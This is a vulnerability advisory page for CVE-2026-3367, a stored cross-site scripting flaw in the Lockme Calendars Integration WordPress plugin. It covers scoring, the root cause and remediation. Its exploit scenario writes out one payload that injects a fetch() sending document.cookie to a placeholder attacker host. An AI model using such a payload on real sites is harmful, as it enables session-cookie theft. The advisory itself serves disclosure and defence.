Skip to main content

Lockme Calendars Integration CVE-2026-3367

| EUVDEUVD-2026-43124 MEDIUM
Cross-site Scripting (XSS) (CWE-79)
2026-07-11 Wordfence GHSA-6q4h-2q4c-jmg7
4.4
CVSS 3.1 · Vendor: Wordfence
Share

Severity by source

Vendor (Wordfence) PRIMARY
4.4 MEDIUM
AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N
vuln.today AI
4.0 MEDIUM

Changed UI:N to UI:R because scope-changed impact requires a second user (victim admin) to navigate to the settings page for the XSS payload to fire against them.

3.1 AV:N/AC:H/PR:H/UI:R/S:C/C:L/I:L/A:N
4.0 AV:N/AC:H/AT:N/PR:H/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N

Primary rating from Vendor (Wordfence).

CVSS VectorVendor: Wordfence

CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N
Attack Vector
Network
Attack Complexity
High
Privileges Required
High
User Interaction
None
Scope
Changed
Confidentiality
Low
Integrity
Low
Availability
None

Lifecycle Timeline

2
Analysis Generated
Jul 11, 2026 - 03:56 vuln.today
CVE Published
Jul 11, 2026 - 02:31 cve.org
MEDIUM 4.4

DescriptionCVE.org

The Lockme OAuth2 calendars integration plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'App ID' setting in all versions up to, and including, 2.11.0. This is due to insufficient input sanitization and output escaping. The register_setting() call on line 197 lacks a sanitize callback, allowing unsanitized data to be stored via update_option(). When the settings page is rendered, the stored value is echoed directly into an HTML input's value attribute without esc_attr() on line 212. This makes it possible for authenticated attackers, with administrator-level access and above, to inject arbitrary web scripts in the settings page that will execute whenever a user accesses the plugin settings page. Multiple fields are affected: App ID (client_id), App Secret (client_secret), Bookings ID prefix (id_prefix), and API domain (api_domain). This vulnerability is particularly impactful in WordPress multisite installations where administrators of individual sites should not be able to execute JavaScript affecting other users.

AnalysisAI

Stored Cross-Site Scripting in the Lockme OAuth2 Calendars Integration WordPress plugin (all versions through 2.11.0) permits authenticated administrators to persist arbitrary JavaScript in four settings fields - App ID, App Secret, Bookings ID prefix, and API domain - which then executes in the browser of any user who loads the plugin settings page. The root cause is a missing sanitize callback in register_setting() (Plugin.php:197) paired with unescaped output via direct echo into an HTML value attribute without esc_attr() (lines 212, 223, 245, 256), a classic CWE-79 dual-failure pattern. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Recon
Obtain WordPress admin credentials
Delivery
Authenticate to wp-admin settings page
Exploit
Submit XSS payload into App ID or related field
Install
Payload persisted unsanitized in wp_options
C2
Super-admin navigates to plugin settings page
Execute
Injected script executes in victim's browser
Impact
Session token or credentials exfiltrated

Vulnerability AssessmentAI

Exploitation Exploitation requires an authenticated WordPress user account with administrator-level privileges or higher - the CVSS vector PR:H confirms this. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment Real-world risk for this vulnerability is moderate-to-low in most single-site WordPress deployments but meaningfully elevated in WordPress multisite networks. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker who has obtained WordPress administrator credentials - whether through credential stuffing, a compromised admin account, or social engineering - navigates to the Lockme Calendars Integration settings page and submits a value such as " autofocus onfocus="fetch('https://attacker.example/steal?c='+document.cookie)" into the App ID field. The payload is stored unsanitized in the wp_options database table. …
Remediation The primary fix is to update the Lockme Calendars Integration plugin to a version that incorporates the upstream patch committed at WordPress SVN revision 3495564 (https://plugins.trac.wordpress.org/changeset?reponame=&old=3495564%40lockme-calendars-integration&new=3495564%40lockme-calendars-integration). … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-3367 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy